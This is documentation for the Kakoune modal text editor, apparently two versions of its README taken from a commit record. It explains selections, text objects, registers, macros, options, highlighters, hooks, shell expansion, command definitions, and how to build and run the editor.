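As an illustration of the _|_ key above, sorting every line of the buffer could\nbe done with (one possible keystroke sequence):\n\n--------------------------------------------------\n%            select the whole buffer\n|sort<ret>   pipe the selection through sort and replace it\n--------------------------------------------------\n\n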
Goto Commands\n-------------\n\nCommands beginning with _g_ are used to go to a certain position and\/or buffer:\n\n * _gh_: select to line begin\n * _gl_: select to line end\n\n * _gg_, _gk_: go to the first line\n * _gj_: go to the last line\n\n * _gt_: go to the first displayed line\n * _gc_: go to the middle displayed line\n * _gb_: go to the last displayed line\n\n * _ga_: go to the previous (alternate) buffer\n * _gf_: open the file whose name is selected\n\n * _g._: go to last buffer modification position\n\nView commands\n-------------\n\nSome commands, all beginning with _v_, manipulate the current view.\n\n * _vv_ or _vc_: center the main selection in the window\n * _vt_: scroll to put the main selection on the top line of the window\n * _vb_: scroll to put the main selection on the bottom line of the window\n * _vh_: scroll the window count columns left\n * _vj_: scroll the window count lines downward\n * _vk_: scroll the window count lines upward\n * _vl_: scroll the window count columns right\n\nJump list\n---------\n\nSome commands, like the goto commands, buffer switch or search commands,\npush the previous selections to the client's jump list. It is possible\nto go forward or backward in the jump list using:\n\n * _control-i_: Jump forward\n * _control-o_: Jump backward\n * _control-s_: save current selections\n\nMulti Selection\n---------------\n\nKak was designed from the start to handle multiple selections.\nOne way to get a multiselection is via the _s_ key.\n\nFor example, to change all occurrences of the word 'roger' to the word 'marcel'\nin a paragraph, here is what can be done:\n\nSelect the paragraph with enough _x_, press _s_ and enter roger, then enter.\nThe paragraph selection is now replaced with a multiselection of each roger in\nthe paragraph. Press _c_ and marcel<esc> to replace the rogers with marcels.\n\nA multiselection can also be obtained with _S_, which splits the current\nselection according to the regex entered. To split a comma-separated list,\nuse _S_ then ', *'.\n\n_s_ and _S_ share the search pattern with _\/_, and hence entering an empty\npattern uses the last one.\n\nAs a convenience, _alt-s_ allows you to split the current selections on\nline boundaries.\n\nTo clear multiple selections, use _space_. To keep only the nth selection\nuse _n_ followed by _space_; to remove only the nth selection, use _n_\nfollowed by _alt-space_.\n\n_alt-k_ allows you to enter a regex and keep only the selections that\ncontain a match for this regex. Using _alt-K_ you can keep the selections\nnot containing a match.\n\n_$_ allows you to enter a shell command and pipe each selection to it.\nSelections whose shell command returns 0 will be kept, the others will be\ndropped.\n\n
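The roger-to-marcel example above thus comes down to the following keystrokes\n(one possible sequence):\n\n--------------------------------------------------\nxxx            select the paragraph, line by line\nsroger<ret>    one selection per match of roger\ncmarcel<esc>   replace each of them with marcel\n--------------------------------------------------\n\n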
Object Selection\n----------------\n\nSome keys allow you to select a text object:\n\n * _alt-a_: selects the whole object\n * _alt-i_: selects the inner object, that is the object excluding its surroundings.\n For example, for a quoted string, this will not select the quote, and\n for a word this will not select trailing spaces.\n * _[_: selects to object start\n * _]_: selects to object end\n * _{_: extends selections to object start\n * _}_: extends selections to object end\n\nAfter this key, you need to enter a second key in order to specify which\nobject you want.\n\n * _b_, _(_ or _)_: select the enclosing parentheses\n * _B_, _{_ or _}_: select the enclosing {} block\n * _r_, _[_ or _]_: select the enclosing [] block\n * _a_, _<_ or _>_: select the enclosing <> block\n * _\"_: select the enclosing double quoted string\n * _'_: select the enclosing single quoted string\n * _`_: select the enclosing grave quoted string\n * _w_: select the whole word\n * _W_: select the whole WORD\n * _s_: select the sentence\n * _p_: select the paragraph\n * _i_: select the current indentation block\n * _n_: select the number\n\nFor nestable objects, a count can be used in order to specify which surrounding\nlevel to select.\n\nRegisters\n---------\n\nRegisters are named lists of text. They are used for various purposes, like\nstoring the last yanked text, or the capture groups associated with the\nselections.\n\nWhile in insert mode, ctrl-r followed by a register name (one character)\ninserts it.\n\nFor example, ctrl-r followed by \" will insert the currently yanked text.\nctrl-r followed by 2 will insert the second capture group from the last regex\nselection.\n\nRegisters are lists, instead of simply text, in order to interact well with\nmultiselection. Each selection has its own captures, or yank buffer.\n\nMacros\n------\n\nKakoune can record and replay a sequence of key presses.\n\nWhen pressing the _Q_ key, followed by an alphabetic key for the macro name,\nKakoune begins macro recording: every pressed key is added to the\nmacro until the _Q_ key is pressed again.\n\nTo replay a macro, use the _q_ key, followed by the macro name.\n\n
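For instance (a hypothetical session), duplicating the current line can be\nrecorded into the macro named l and replayed at will:\n\n--------------------------------------------------\nQl    start recording into the macro named l\nxyp   select the line, yank it, paste it below\nQ     stop recording\nql    replay the macro on another line\n--------------------------------------------------\n\n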
Search selection\n----------------\n\nUsing the _*_ key, you can set the search pattern to the current selection.\nThis tries to be intelligent. It will for example detect if the current selection\nbegins and\/or ends at word boundaries, and set the search pattern accordingly.\n\nWith _alt-*_ you can set the search pattern to the current selection without\nKakoune trying to be smart.\n\nBasic Commands\n--------------\n\nCommands are entered using +:+.\n\n * +e[dit] <filename> [<line> [<column>]]+: open buffer on file, go to given\n line and column. If the file is already opened, just switch to this file.\n Use edit! to force reloading.\n * +w[rite] [<filename>]+: write buffer to <filename>, or use its name if\n no filename is given.\n * +q[uit]+: exit Kakoune; use quit! to force quitting even if some\n unsaved buffers remain.\n * +wq+: write current buffer and quit\n * +b[uffer] <name>+: switch to buffer <name>\n * +d[el]b[uf] [<name>]+: delete the buffer <name>; use d[el]b[uf]! to force\n deleting a modified buffer.\n * +source <filename>+: execute commands in <filename>\n * +runtime <filename>+: execute commands in <filename>, <filename>\n is relative to the kak executable path.\n * +nameclient <name>+: set current client name\n * +namebuf <name>+: set current buffer name\n * +echo <text>+: show <text> in the status line\n * +nop+: does nothing, but as with every other command, arguments may be\n evaluated. So nop can be used for example to execute a shell command\n while being sure that its output will not be interpreted by kak.\n +:%sh{ echo echo tchou }+ will echo tchou in Kakoune, whereas\n +:nop %sh{ echo echo tchou }+ will not, but both will execute the\n shell command.\n\nExec and Eval\n-------------\n\nThe +:exec+ and +:eval+ commands can be used for running Kakoune commands.\n+:exec+ runs keys as if they were pressed, whereas +:eval+ executes its given\nparameters as if they were entered in the command prompt. By default,\nthey execute in the context of the current client.\n\nSome parameters provide a way to change the context of execution:\n\n * +-client <name>+: execute in the context of the client named <name>\n * +-try-client <name>+: execute in the context of the client named\n <name> if such a client exists, or else in the current context.\n * +-draft+: execute in a copy of the context of the selected client;\n modifications to the selections or input state will not affect\n the client. This makes it possible to modify the buffer\n without touching the user's selections.\n * +-itersel+ (requires +-draft+): execute once per selection, in a\n context with only the considered selection. This avoids\n cases where the selections might otherwise get merged.\n * +-buffer <names>+: execute in the context of each buffer in the\n comma-separated list <names>\n * +-no-hooks+: disable hook execution while executing the keys\/commands\n\nThe execution stops when the last key\/command is reached, or an error\nis raised.\n\nKey parameters get concatenated, so the following commands are equivalent.\n\n----------------------\n:exec otest<space>1\n:exec o test <space> 1\n----------------------\n\nString syntax\n-------------\n\nWhen entering a command, parameters are separated by whitespace (shell-like);\nif you want to give parameters with spaces, you should quote them.\n\nKakoune supports the following string syntaxes:\n\n * +\"strings\" and \\'strings\\'+: classic strings, use \\' or \\\" to escape the\n separator.\n\n * +%\\{strings\\}+: these strings are very useful when entering commands\n\n - the '{' and '}' delimiters are configurable: you can use any non\n alphanumeric character, like %[string], %<string>, %(string), %~string~\n or %!string!...\n - if the character following the % is one of {[(<, then the closing one is\n the matching }])> and the delimiters are not escapable but are nestable.\n For example +%{ roger {}; }+ is a valid string, +%{ marcel \\}+ as well.\n\nOptions\n-------\n\nFor user configuration, Kakoune supports options.\n\nOptions are typed; their type can be:\n\n * +int+: an integer number\n * +bool+: a boolean value, +yes\/true+ or +no\/false+\n * +yesnoask+: similar to a boolean, but the additional\n value +ask+ is supported.\n * +str+: a string, some freeform text\n * +regex+: as a string, but the +set+ command will complain\n if the entered text is not a valid regex.\n * +{int,str}-list+: a list; elements are separated by a colon (:),\n and if an element needs to contain a colon, it can be escaped with a\n backslash.\n\nOption values can be changed using the +set+ command:\n\n--------------------------------------------------------------\n:set [global,buffer,window] <option> <value> # buffer, window, or global scope\n--------------------------------------------------------------\n\nOption values can differ by scope: an option can have a global\nvalue, a buffer value and a window value. The effective value of an\noption depends on the current context. If we have a window in the\ncontext (interactive editing for example), then the window value\n(if any) is used; if not we try the buffer value (if we have a buffer\nin the context), and if not we use the global value.\n\nThat means that two windows on the same buffer can use different options\n(like different filetype, or different tabstop).\n\n
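For example, a window-local override of a global default (values arbitrary):\n\n--------------------------------------------------------------\n:set global tabstop 4\n:set window tabstop 8\n--------------------------------------------------------------\n\nEvery window now uses a tab width of 4, except the current one, which uses 8.\n\n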
However some options\nmight end up ignored if their scope is not in the command context:\n\nWriting a file never uses the window options for example, so any\noptions related to writing wont be taken into account if set in the\nwindow scope (+BOM+ or +eolformat+ for example).\n\nNew options can be declared using the +:decl+ command:\n\n---------------------------------------\n:decl [-hidden] <type> <name> [<value>]\n---------------------------------------\n\nthe +-hidden+ parameter makes the option invisible in completion, but\nstill modifiable.\n\nSome options are built in Kakoune, and can be used to control it's behaviour:\n\n * +tabstop+ _int_: width of a tab character.\n * +indentwidth+ _int_: width (in spaces) used for indentation.\n 0 means a tab character.\n * +scrolloff+ _int_: number of lines to keep visible above\/below\n the cursor when scrolling.\n * +eolformat+ _string_ ('lf' or 'crlf'): the format of end of lines when\n writing a buffer, this is autodetected on load.\n * +BOM+ _string_ (\"no\" or \"utf-8\"): define if the file should be written\n with an unicode byte order mark.\n * +complete_prefix+ _bool_: when completing in command line, and multiple\n candidates exist, enable completion with common prefix.\n * +incsearch+ _bool_: execute search as it is typed\n * +aligntab+ _bool_: use tabs for alignement command\n * +autoinfo+ _bool_: display automatic information box for certain commands.\n * +autoshowcompl+ _bool_: automatically display possible completions when\n editing a prompt.\n * +ignored_files+ _regex_: filenames matching this regex wont be considered\n as candidates on filename completion (except if the text being completed\n already matches it).\n * +filetype+ _str_: arbitrary string defining the type of the file\n filetype dependant actions should hook on this option changing for\n activation\/deactivation.\n * +path+ _str-list_: directories to search for gf command.\n * +completers+ _str-list_: completion systems to use for insert mode\n completion. given completers are tried in order until one generate some\n completion candidates. Existing completers are:\n - +word=all+ or +word=buffer+ which complete using words in all buffers\n (+word=all+) or only the current one (+word=buffer+)\n - +filename+ which tries to detect when a filename is being entered and\n provides completion based on local filesystem.\n - +option=<opt-name>+ where <opt-name> is a _str-list_ option. The first\n element of the list should follow the format:\n _<line>.<column>[+<length>]@<timestamp>_ to define where the completion\n apply in the buffer, and the other strings are the candidates.\n * +autoreload+ _yesnoask_: auto reload the buffers when an external\n modification is detected.\n\nInsert mode completion\n----------------------\n\nKakoune can propose completions while inserting text, the +completers+ option\ncontrol automatic completion, which kicks in when a certain idle timeout is\nreached (100 milliseconds). 
Insert mode completion\n----------------------\n\nKakoune can propose completions while inserting text; the +completers+ option\ncontrols automatic completion, which kicks in when a certain idle timeout is\nreached (100 milliseconds). Insert mode completion can be explicitly triggered\nusing *control-x*, followed by:\n\n * *f* : filename completion\n * *w* : buffer word completion\n * *l* : buffer line completion\n * *o* : option based completion\n\nHighlighters\n------------\n\nManipulation of the displayed text is done through highlighters, which can be added\nor removed with the command\n\n-----------------------------------------------------\n:addhl <highlighter_name> <highlighter_parameters...>\n-----------------------------------------------------\n\nand\n\n----------------------\n:rmhl <highlighter_id>\n----------------------\n\nGeneral highlighters are:\n\n * +regex <ex> <color>...+: highlight a regex; takes the regex as first parameter,\n followed by any number of color parameters. The color format is:\n <capture_id>:<fg_color>[,<bg_color>]\n For example: `:addhl regex \/\/(\\h+TODO:)?[^\\n]+ 0:cyan 1:yellow,red`\n will highlight C++ style comments in cyan, with an optional 'TODO:' in\n yellow on red background.\n * +search <color>+: highlight every match of the current search pattern. Takes\n one parameter for the color to apply to highlighted elements.\n * +flag_lines <flag> <option_name>+: add a column in front of text, and display the\n given flag in it for every line contained in the int-list option named\n <option_name>.\n * +show_matching+: highlight the character matching the one under each selection's\n cursor using the +MatchingChar+ color alias.\n * +number_lines+: show line numbers\n * +fill <color>+: fill with given color, mostly useful with region highlighters\n (see below)\n\nHighlighting Groups\n~~~~~~~~~~~~~~~~~~~\n\nThe +group+ highlighter is a container for other highlighters. You can add\na group to the current window using\n\n------------------\naddhl group <name>\n------------------\n\nand then the +-group+ switch of +addhl+ provides a means to add highlighters\ninside this group.\n\n--------------------------------------\naddhl -group <name> <type> <params>...\n--------------------------------------\n\nGroups can contain other groups; the +-group+ switch can be used to define a path.\n\n------------------------------------------------\naddhl -group <name> group <subname>\naddhl -group <name>\/<subname> <type> <params>...\n------------------------------------------------\n\n
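For instance (group name, regex and colors arbitrary), a group makes it easy to\nadd and remove a set of related highlighters at once:\n\n---------------------------------------------\naddhl group todos\naddhl -group todos regex TODO 0:yellow,red\naddhl -group todos number_lines\nrmhl todos\n---------------------------------------------\n\n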
Region highlighters\n~~~~~~~~~~~~~~~~~~~\n\nThe +region+ highlighter takes 3 to 4 parameters:\n\n---------------------------------------------------\naddhl region <name> <opening> <closing> [<recurse>]\n---------------------------------------------------\n\n+name+ is user defined, but +opening+, +closing+ and +recurse+ are regexes.\n\n * +opening+ defines the region start text\n * +closing+ defines the region end text\n * +recurse+ defines the text that matches recursively an end token into the region.\n\n+recurse+ is useful for regions that can be nested, for example the +%sh{ ... }+\nconstruct in kakoune accepts nested +{ ... }+, so +%sh{ ... { ... } ... }+ is valid.\nThis region can be defined with:\n\n-------------------------------------\naddhl region shell_expand %sh\\{ \\} \\{\n-------------------------------------\n\nIt then provides a group named +content+ which can be filled with other highlighters\nthat will only be applied on the given regions.\n\n-------------------------------------\naddhl -group shell_expand\/content ...\n-------------------------------------\n\nThe +multi_region+ highlighter is even more powerful: it can segment the buffer\ninto non-overlapping regions.\n\n-------------------------------------------------------------------------\naddhl multi_region <name> <region_name1> <opening1> <closing1> <recurse1> \\\n <region_name2> <opening2> <closing2> <recurse2>...\n-------------------------------------------------------------------------\n\ndefines multiple regions in which other highlighters can be added\n\n-------------------------------------\naddhl -group <name>\/<region_name> ...\n-------------------------------------\n\nRegions are matched using the left-most rule: the left-most region opening starts\na new region. When a region closes, the closest next opening starts another region.\n\nThat matches the rule governing most programming language parsing.\n\n+multi_region+ also supports a +-default <default_region>+ switch to define the\ndefault region, used when no other region matches the current buffer range.\n\nMost programming languages can then be properly highlighted using a +multi_region+\nhighlighter as root:\n\n-----------------------------------------------------------------\naddhl multi_region -default code <lang> \\\n string <str_opening> <str_closing> <str_recurse> \\\n comment <comment_opening> <comment_closing> <comment_recurse>\n\naddhl -group <lang>\/code ...\naddhl -group <lang>\/string ...\naddhl -group <lang>\/comment ...\n-----------------------------------------------------------------\n\nShared Highlighters\n~~~~~~~~~~~~~~~~~~~\n\nHighlighters are often defined for a specific filetype, and it then makes sense to\nshare the highlighters between all the windows on the same filetype.\n\nA shared highlighter can be defined with the +:addhl+ command\n\n------------------------------\naddhl -group \/<group_name> ...\n------------------------------\n\nWhen the group switch value starts with a '\/', it references a group in the\nshared highlighters, rather than the window highlighters.\n\nThe common case would be to create a named shared group, and then fill it\nwith highlighters:\n\n---------------------------\naddhl -group \/ group <name>\naddhl -group \/name regex ...\n---------------------------\n\nIt can then be referenced in a window using the +ref+ highlighter.\n\n----------------\naddhl ref <name>\n----------------\n\nThe +ref+ highlighter can reference any named highlighter in the shared namespace.\n\n
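A typical pattern (filetype, group name, regex and color hypothetical) combines\na shared group with a hook (described in the next section), so highlighters\ndefined once get attached to every window of a given filetype:\n\n------------------------------------------------------------\naddhl -group \/ group kak\naddhl -group \/kak regex \\bdef\\b 0:yellow\nhook global WinSetOption filetype=kak %{ addhl ref kak }\n------------------------------------------------------------\n\n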
Hooks\n-----\n\nCommands can be registered to be executed when certain events arise.\nTo register a hook, use the hook command.\n\n------------------------------------------------------\n:hook <scope> <hook_name> <filtering_regex> <commands>\n------------------------------------------------------\n\n<scope> can be either global, buffer or window (or any of their prefixes);\nthe scopes are hierarchical, meaning that a window calling a hook will\nexecute its own, the buffer ones and the global ones.\n\n<command> is a string containing the commands to execute when the hook is\ncalled.\n\nFor example, to automatically use line numbering with .cc files,\nuse the following command:\n\n-----------------------------------------------------\n:hook global WinCreate .*\\.cc %{ addhl number_lines }\n-----------------------------------------------------\n\nExisting hooks are:\n\n * +NormalIdle+: A certain duration has passed since last key was pressed in\n normal mode.\n * +NormalBegin+: Entering normal mode\n * +NormalEnd+: Leaving normal mode\n * +NormalKey+: A key is received in normal mode, the key is used for filtering\n * +InsertIdle+: A certain duration has passed since last key was pressed in\n insert mode.\n * +InsertBegin+: Entering insert mode\n * +InsertEnd+: Leaving insert mode\n * +InsertKey+: A key is received in insert mode, the key is used for filtering\n * +InsertMove+: The cursor moved (without inserting) in insert mode, the key\n that triggered the move is used for filtering\n * +WinCreate+: A window was created, the filtering text is the buffer name\n * +WinClose+: A window was destroyed, the filtering text is the buffer name\n * +WinDisplay+: A window was bound to a client, the filtering text is the buffer\n name\n * +WinSetOption+: An option was set in a window context, the filtering text\n is '<option_name>=<new_value>'\n * +BufSetOption+: An option was set in a buffer context, the filtering text\n is '<option_name>=<new_value>'\n * +BufNew+: A buffer for a new file has been created, filename is used for\n filtering\n * +BufOpen+: A buffer for an existing file has been created, filename is\n used for filtering\n * +BufCreate+: A buffer has been created, filename is used for filtering\n * +BufWritePre+: Executed just before a buffer is written, filename is\n used for filtering.\n * +BufWritePost+: Executed just after a buffer is written, filename is\n used for filtering.\n * +RuntimeError+: An error was encountered while executing a user command;\n the error message is used for filtering\n * +KakBegin+: Kakoune started, this is called just after reading the user\n configuration files\n * +KakEnd+: Kakoune is quitting.\n\nWhen not specified, the filtering text is an empty string.\n\nKey Mapping\n-----------\n\nYou can redefine a key's meaning using the map command\n\n------------------------------------------------------\n:map <scope> <mode> <key> <keys>\n------------------------------------------------------\n\nwith +scope+ being one of +global, buffer or window+ (or any prefix),\nmode being +insert, normal, prompt or menu+ (or any prefix), +key+ being\na single key name and +keys+ a list of keys.\n\n
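For instance (an arbitrary, hypothetical binding reusing the keys from the macro\nexample above), to make _^_ duplicate the current line in normal mode:\n\n------------------------------------------------------\n:map global normal ^ xyp\n------------------------------------------------------\n\n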
Color Aliases\n-------------\n\nA colorspec takes the form <fg_color>[,<bg_color>]; it can be named using the\nfollowing command.\n\n--------------------------\n:colalias <name> <colspec>\n--------------------------\n\nNote that a colspec can itself be a color alias.\n\nUsing color aliases instead of colorspecs makes it possible to change the\neffective colors afterwards.\n\nThere are some builtin color aliases:\n\n * +PrimarySelection+: main selection color for every selected character except\n the cursor\n * +SecondarySelection+: secondary selection color for every selected character\n except the cursor\n * +PrimaryCursor+: cursor of the primary selection\n * +SecondaryCursor+: cursor of the secondary selection\n * +LineNumbers+: colors used by the number_lines highlighter\n * +MenuForeground+: colors for the selected element in menus\n * +MenuBackground+: colors for the non-selected elements in menus\n * +Information+: colors for information windows and information messages\n * +Error+: colors of error messages\n * +StatusLine+: colors used for the status line\n * +StatusCursor+: colors used for the status line cursor\n * +Prompt+: colors used for the prompt displayed on the status line\n\nShell expansion\n---------------\n\nA special string syntax is supported which replaces its content with the\noutput of the shell commands in it; it is similar to the shell $(...)\nsyntax and is evaluated only when needed.\nFor example: %sh{ ls } is replaced with the output of the ls command.\n\nSome of Kakoune state is available through environment variables:\n\n * +kak_selection+: content of the main selection\n * +kak_selections+: content of the selections separated by colons; colons in\n the selection contents are escaped with a backslash.\n * +kak_bufname+: name of the current buffer\n * +kak_timestamp+: timestamp of the current buffer; the timestamp is an\n integer value which is incremented each time the buffer is modified.\n * +kak_runtime+: directory containing the kak binary\n * +kak_opt_<name>+: value of option <name>\n * +kak_reg_<r>+: value of register <r>\n * +kak_socket+: filename of session socket (\/tmp\/kak-<session>)\n * +kak_client+: name of current client\n * +kak_cursor_line+: line of the end of the main selection\n * +kak_cursor_column+: column of the end of the main selection (in bytes)\n * +kak_cursor_char_column+: column of the end of the main selection (in characters)\n * +kak_hook_param+: filtering text passed to the currently executing hook\n\nNote that in order to make only needed information available, Kakoune needs\nto find the environment variable reference in the shell script executed.\nHence +%sh{ .\/script.sh }+ with +script.sh+ referencing an environment\nvariable will not work.\n\nFor example you can print information about the current file in the status\nline using:\n\n-------------------------------\n:echo %sh{ ls -l $kak_bufname }\n-------------------------------\n\nRegister and Option expansion\n-----------------------------\n\nSimilar to shell expansion, register contents and option values can be\naccessed through %reg{<register>} and %opt{<option>} syntax.\n\nFor example you can display the last search pattern with\n\n-------------\n:echo %reg{\/}\n-------------\n\n
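Option expansion works the same way; for example, the effective tab width of\nthe current window can be shown with:\n\n-------------------\n:echo %opt{tabstop}\n-------------------\n\n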
Defining Commands\n-----------------\n\nNew commands can be defined using the +:def+ command.\n\n------------------------------\n:def <command_name> <commands>\n------------------------------\n\n<commands> is a string containing the commands to execute.\n\n+def+ can also take some flags:\n\n * +-env-params+: pass parameters given to commands in the environment as\n kak_paramN with N the parameter number\n * +-shell-params+: pass parameters given to commands as positional parameters\n to any shell expansions used in the command.\n * +-file-completion+: try file completion on any parameter passed\n to this command\n * +-shell-completion+: following string is a shell command which takes\n parameters as positional params and outputs one\n completion candidate per line.\n * +-allow-override+: allow the new command to replace an existing one\n with the same name.\n * +-hidden+: do not show the command in command name completions\n * +-docstring+: define the documentation string for the command\n\nUsing shell expansion makes it possible to define complex commands or to access\nKakoune state:\n\n------------------------------------------------------\n:def print_selection %{ echo %sh{ ${kak_selection} } }\n------------------------------------------------------\n\nSome helper commands can be used to define composite commands:\n\n * +:prompt <prompt> <register> <command>+: Prompt the user for a string; when\n the user validates, store the result in the given <register> and run <command>.\n The -init <str> switch allows setting the initial content.\n * +:menu <label1> <commands1> <label2> <commands2>...+: display a menu using\n labels, the selected label's commands are executed.\n +menu+ can take a -auto-single argument, to automatically run commands\n when only one choice is provided, and a -select-cmds argument, in which\n case menu takes three arguments per item, the last one being a command\n to execute when the item is selected (but not validated).\n * +:info <text>+: display text in an information box; it can take a -anchor\n option, which accepts +left+, +right+ and +cursor+ as values, in order to\n specify where the info box should be anchored relative to the main selection.\n * +:try <commands> catch <on_error_commands>+: prevent an error in <commands>\n from aborting the whole command execution, execute <on_error_commands>\n instead. If nothing is to be done on error, the catch part can be omitted.\n * +:reg <name> <content>+: set register <name> to <content>\n\nNote that these commands are available in interactive command mode, but are\nnot that useful in this context.\n\n
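A composite command mixing these helpers could look like this (command name and\nfile name hypothetical):\n\n-----------------------------------------------------------------------\n:def load-project %{ try %{ source project.kak } catch %{ echo no project file } }\n-----------------------------------------------------------------------\n\n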
FIFO Buffer\n-----------\n\nThe +:edit+ command can take a -fifo parameter:\n\n---------------------------------------------\n:edit -fifo <filename> [-scroll] <buffername>\n---------------------------------------------\n\nIn this case, a buffer named +<buffername>+ is created which reads its content\nfrom the fifo +<filename>+. When the fifo is written to, the buffer is automatically\nupdated.\n\nIf the +-scroll+ switch is specified, the initial cursor position will be made\nsuch that the window displaying the buffer will scroll as new data is read.\n\nThis is very useful for running some commands asynchronously while displaying\ntheir result in a buffer. See rc\/make.kak and rc\/grep.kak for examples.\n\nWhen the buffer is deleted, the fifo will be closed, so any program writing\nto it will receive SIGPIPE. This is useful as it stops the writing\nprogram once the buffer is gone.\n\nMenus\n-----\n\nWhen a menu is displayed, you can use *j*, *control-n* or *tab* to select the next\nentry, and *k*, *control-p* or *shift-tab* to select the previous one.\n\nUsing the *\/* key, you can enter some regex in order to restrict available choices\nto the matching ones.\n\nKakrc\n-----\n\nThe kakrc file next to the kak binary (in the src directory for the moment)\nis a list of kak commands to be executed at startup.\n\nThe current behaviour is to execute local user commands in the file\n$HOME\/.config\/kak\/kakrc and in all files in the $HOME\/.config\/kak\/autoload\ndirectory.\n\nPlace links to the files in src\/rc\/ in your autoload directory in order to\nexecute them on startup, or use the runtime command (which sources relative\nto the kak binary) to load them on demand.\n\nExisting command files are:\n\n * *rc\/kakrc.kak*: provides autodetection and highlighting for kak command files\n * *rc\/cpp.kak*: provides autodetection and highlighting for C\/CPP files and the\n +:alt+ command for switching between a C\/CPP file and its h\/hpp counterpart.\n * *rc\/asciidoc.kak*: provides autodetection and highlighting for asciidoc files\n * *rc\/diff.kak*: provides autodetection and highlighting for patch\/diff files\n * *rc\/git.kak*: provides various git format highlighting (commit message editing,\n interactive rebase)\n * *rc\/git-tools.kak*: provides some git integration, like +:git-blame+, +:git-show+\n or +:git-diff-show+\n * *rc\/make.kak*: provides the +:make+ and +:errjump+ commands along with\n highlighting for compiler output.\n * *rc\/man.kak*: provides the +:man+ command\n * *rc\/grep.kak*: provides the +:grep+ and +:gjump+ commands along with highlighting\n for grep output.\n * *rc\/ctags.kak*: provides the +:tag+ command to jump to a tag definition using\n exuberant ctags files; this script requires the *readtags* binary, available\n in the exuberant ctags package but not installed by default.\n * *rc\/client.kak*: provides the +:new+ command to launch a new client on the current\n session; if tmux is detected, the client is launched in a new tmux split, otherwise\n in a new terminal emulator.\n * *rc\/clang.kak*: provides the +:clang-enable-autocomplete+ command for C\/CPP\n insert mode completion support. This requires the clang++ compiler to be\n available. You can use the +clang_options+ option to specify switches to\n be passed to the compiler.\n\nCertain command files define options, such as +grepcmd+ (for +:grep+), +makecmd+\n(for +:make+) or +termcmd+ (for +:new+).\n\nSome options are shared with commands. +:grep+ and +:make+ honor the +toolsclient+ option,\nif specified, to open their buffer in it rather than the current client. +:man+ honors\nthe +docsclient+ option for the same purpose.\n","old_contents":"
\nMost commands move both of\nthem, except when extending selections, where the anchor character stays fixed\nand the cursor one moves around.\n\nSee http:\/\/vimeo.com\/82711574\n\nJoin us on freenode IRC +#Kakoune+\n\nFeatures\n--------\n\n * Multiple selections as a central way of interacting\n * Powerful selection manipulation primitives\n - Select all regex matches in current selections\n - Keep selections containing\/not containing a match for a given regex\n - Split current selections with a regex\n - Text objects (paragraph, sentence, nestable blocks)\n * Powerful text manipulation primitives\n - Align selections\n - Rotate selection contents\n - Case manipulation\n - Indentation\n - Piping each selection to an external filter\n * Client-Server architecture\n - Multiple clients on the same editing session\n - Use tmux or your X11 window manager to manage windows\n * Simple interaction with external programs\n * Automatic contextual help\n * Automatic as-you-type completion\n * Macros\n * Hooks\n * Syntax Highlighting\n\nBuilding\n--------\n\nKakoune dependencies are:\n\n * A C++11 compliant compiler (GCC >= 4.8.1 or clang >= 3.4)\n * boost (>= 1.50)\n * ncurses with wide-character support (>= 5.3, generally referred to as libncursesw)\n\nTo build, just type *make* in the src directory.\n\nKakoune can be built on Linux, MacOS, and Cygwin. Due to Kakoune relying heavily\non being in a Unix-like environment, no native Windows version is planned.\n\nTo set up a basic configuration on your account, type *make userconfig* in the\nsrc directory; this will set up an initial $XDG_CONFIG_HOME\/kak directory. See\nthe _Kakrc_ section for more information.\n\nInstalling\n----------\n\nIn order to install kak on your system, rather than running it directly from\nits source directory, type *make install*; you can specify +PREFIX+ and\n+DESTDIR+ if needed.\n\nNote that by default, no script files will be read if you do not add links\nto them in $XDG_CONFIG_HOME\/kak\/autoload. Available script files will be\ninstalled in $PREFIX\/share\/kak\/rc.\n\nIf you want to enable all files, set $XDG_CONFIG_HOME\/kak\/autoload to be\na symbolic link to the $PREFIX\/share\/kak\/rc directory.\n\n----------------------------------------------\nln -s \/usr\/share\/kak\/rc ~\/.config\/kak\/autoload\n----------------------------------------------\n\nRunning\n-------\n\nJust running *kak* launches a new kak session with a client on the local terminal.\n*kak* accepts some switches:\n\n * +-c <session>+: connect to the given session; sessions are unix sockets\n +\/tmp\/kak-<session>+\n * +-e <commands>+: execute commands on startup\n * +-n+: ignore the kakrc file\n * +-s <session>+: set the session name, by default it will be the pid\n of the initial kak process.\n * +-d+: run Kakoune in daemon mode, without user interface. This requires\n the session name to be specified with -s. In this mode, the Kakoune\n server will keep running even if there is no connected client, and\n will quit when receiving SIGTERM.\n * +-p <session>+: read stdin, and then send its content to the given session,\n acting as a remote control.
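\n\nFor example, a sketch of remote control through +-p+ (the session name and edited file are illustrative):\n\n-------------------------------------------\necho edit \/tmp\/notes.txt | kak -p mysession\n-------------------------------------------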
\n\nAt startup, if +-n+ is not specified, Kakoune will try to source the file\n..\/share\/kak\/kakrc relative to the kak binary. This kak file will then try\nto source $XDG_CONFIG_HOME\/kak\/kakrc (with $XDG_CONFIG_HOME defaulting to\n$HOME\/.config), and any files in $XDG_CONFIG_HOME\/kak\/autoload.\n\nThe common pattern is to add links in $XDG_CONFIG_HOME\/kak\/autoload to the\nscripts in $PREFIX\/share\/kak\/rc that the user wants sourced at kak launch.\n\nBasic Movement\n--------------\n\n * _space_: select the character under the last selection end\n * _alt-space_: flip the selections direction\n\n * _h_: select the character on the left of selection end\n * _j_: select the character below the selection end\n * _k_: select the character above the selection end\n * _l_: select the character on the right of selection end\n\n * _w_: select the word and following whitespaces on the right of selection end\n * _b_: select preceding whitespaces and the word on the left of selection end\n * _e_: select preceding whitespaces and the word on the right of selection end\n * _alt-[wbe]_: same as [wbe] but select WORD instead of word\n\n * _x_: select the line on which the selection end lies (or the next line when the end lies on\n an end-of-line)\n * _alt-x_: expand selections to contain full lines (including end-of-lines)\n * _alt-X_: trim selections to only contain full lines (not including the last\n end-of-line)\n\n * _%_: select the whole buffer\n\n * _alt-H_: select to line begin\n * _alt-L_: select to line end\n\n * _\/_: search (select next match)\n * _?_: search (extend to next match)\n * _n_: select next match\n * _N_: add a new selection with the next match\n * _alt-n_: replace the main selection with the next match (preserving the others)\n\n * _pageup_: scroll up\n * _pagedown_: scroll down\n\n * _alt-r_: rotate selections (the main selection becomes the next one)\n\nA word is a sequence of alphanumeric characters or underscores; a WORD is a\nsequence of non-whitespace characters.\n\nAppending\n---------\n\nFor most selection commands, using shift permits extending the current selection\ninstead of replacing it.
